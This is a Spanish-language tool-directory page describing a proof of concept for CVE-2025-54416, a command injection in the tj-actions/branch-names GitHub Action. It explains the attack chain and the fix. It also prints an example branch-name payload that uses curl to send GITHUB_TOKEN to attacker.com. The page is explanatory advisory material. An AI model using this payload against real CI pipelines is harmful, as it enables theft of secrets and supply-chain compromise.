Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
Análisis de VulnerabilidadesExplotaciónExfiltración de DatosComando y ControlSeguridad de Cadena de SuministroAprendizaje y Educación
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

PoC para CVE-2025-54416 inyección de comandos en tj-actions/branch-names

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54416: PoC de inyección de comandos en tj-actions/branch-names

Este repositorio demuestra CVE-2025-54416, una vulnerabilidad crítica de inyección de comandos en tj-actions/branch-names que afecta a más de 5,000 repositorios públicos.

Vulnerabilidad

La GitHub Action tj-actions/branch-names (versiones <= 8.2.1) utiliza un inseguro eval printf "%s" que reintroduce riesgos de inyección de comandos después de una sanitización adecuada.

root@kitploit:~
# Patrón de código vulnerable en tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

Cadena de ataque

  1. El atacante crea una rama con un nombre malicioso que contiene comandos de shell
  2. El flujo de trabajo de la víctima usa tj-actions/[email protected] para extraer el nombre de la rama
  • El nombre de la rama extraído (con la carga útil del atacante) se usa en comandos de shell posteriores
  • El comando se ejecuta en el contexto del runner de CI con los privilegios del runner
  • Los secretos (claves AWS, GITHUB_TOKEN, etc.) son exfiltrados
  • Ejemplo de carga útil

    Nombre de rama: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

    Cuando el flujo de trabajo se ejecuta:

    root@kitploit:~
    echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
    # Salida real: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
    # El $(...) es evaluado por el shell, exfiltrando GITHUB_TOKEN
    

    Impacto

    • Robo de secretos sensibles (claves AWS, tokens de API, GITHUB_TOKEN)
    • Modificaciones de código no autorizadas
    • Envíos de imágenes maliciosas a registros de producción
    • Ataques a la cadena de suministro mediante CI/CD comprometido

    Solución

    Actualice a tj-actions/branch-names@v9 o posterior, que reemplaza eval printf "%s" por llamadas seguras a printf.

    Referencias

    • Aviso de GitHub GHSA-gq52-6phf-x2r6
    • CVE-2025-54416
    Descargar herramienta